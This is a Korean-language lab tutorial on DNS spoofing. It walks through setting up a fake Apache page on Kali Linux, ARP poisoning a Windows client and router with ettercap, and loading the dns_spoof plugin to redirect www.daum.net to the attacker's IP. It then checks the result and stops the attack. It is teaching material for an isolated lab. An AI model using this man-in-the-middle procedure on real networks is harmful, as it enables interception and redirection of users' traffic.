Application Layer DNS spoofing [TCP/IP Model]

 

Application Layer(DNS, HTTP, SNMP, SMTP, ..)

 

DNS spoofing

 

 

 

DNS Spoofing

 

 

 

 

■ 사용시스템

- windows 2008(웹클라이언트) : 192.168.20.201

- Kali Linux : 192.168.20.50

- firewall (방화벽/라우터): 192.168.20.100

 

■ 용어

Spoofing

arp spoofing

ip spoofing

dns spoofing

dhcp spoofing

 

■ DNS Spoofing을 하기 위한 기능

(ㄱ) Arp spoofing + IP forwarding

(ㄴ) Fake WEB

(ㄷ) Fake DNS (DNS Spoofing)

 

 

DNS Spoofing 동작원리

 

 

 

  

[실습] dns spoofing 실습을 해 보자.

 

(Kali Linux)

 

        DNS Spoofing을 하기 위한 기능

        (ㄱ) Arp spoofing + IP forwarding

        (ㄴ) Fake WEB

        (ㄷ) Fake DNS (DNS Spoofing)

 

① KaliLinux에 Fake WEB 서버 설정

 

CentOS) /etc/httpd/conf/httpd.conf

        /var/www/html/index.html

        # service httpd restart

        # chkconfig httpd on

Debian) /etc/apache2/apache2.conf

        /var/www/html/index.html

        # service apache2 restart

        # update-rc.d apache2 enable

apache2 찾기 (redhat) # cd /etc/init.d ; ls (standalon service) # cd /etc/xinet.d ; ls (xinetd service)  커맨드로 확인하는 방법 # chkconfig --list (운영체제 배포판 마다 관리용 커맨드가 다르다) (debian) # cd /etc/init.d ; ls (standalon service) # dpkg -l | grep xinetd  (xinetd service) # dpkg -l | grep inetd -> cat /etc/inetd.conf 주설정 파일 안에 inetd방식 서비스 목록이 있다. 커맨드로 확인하는 방법(서비스 전체 목록) # service --status-all

 

# cd /etc/apache2

# ls

apache2.conf conf-enabled magic mods-enabled sites-available conf-available envvars mods-available ports.conf sites-enabled

 

KaliLinux 1.X) # cd /var/www

KaliLinux 2.X) # cd /var/www/html

 

 

 

# cd /var/www/html

# ls

index.html

 

# echo "Fake Web Site" > /var/www/html/index.html

 

# service apache2 restart

# pgrep -lf apache (# service apache2 status)

 

# firefox http://192.168.20.50

-> 확인 후 종료

 

 

DNS Spoofing을 하기 위한 기능

(ㄱ) Arp spoofing + IP forwarding

(ㄴ) Fake WEB

(ㄷ) Fake DNS (DNS Spoofing)

 

② ARP Spoofing & dns_spoof plugin load

# cd /etc/ettercap

# ls

etter.conf etter.dns etter.mdns etter.nbns

 

# vi etter.dns

 

- (주의) ettercap 툴을 완전히 종료한 후 다시 실행하고 설정을 한다.

ettercap 툴이 변경된 /etc/ettercap/etter.dns 파일을 다시 읽어 들이도록 한다.

 

# ettercap -G &

---------------------------------------------------------

Sniff > Unfied sniffing > eth1

 

Hosts > Scan for host

Hosts > Host list

 

192.168.20.100 선택 -> Add to Target 1

192.168.20.201 선택 -> Add to Target 2

 

Mitm > Arp poisoning > Optional parameter

Sniff remote connection

 

Plugins > Manage the plugins > dns_spoof 더블클릭

Start > Start sniffing

---------------------------------------------------------

 

 

(window2008)

현재 ipconfig에 등록되 있는 displaydns 출력

 

③ windows 2008 서버에서 웹브라우저를 실행하고 www.daum.net 접속

c:> ipconfig /flushdns

 

웹브라우저에서 http://www.daum.net 접속한다.

-> 192.168.20.50 내용이 보인다.

nslookup을 통한 www.daum.net 의 ip주소 가 공격자의 ip주소인 것을 확인

 

c:> ipconfig /displaydns

 

(복원) ettercap 종료

절차를 지켜 종료 시켜 주세요.

mitm > Stop mitm attack > 확인

Start > Stop sniffing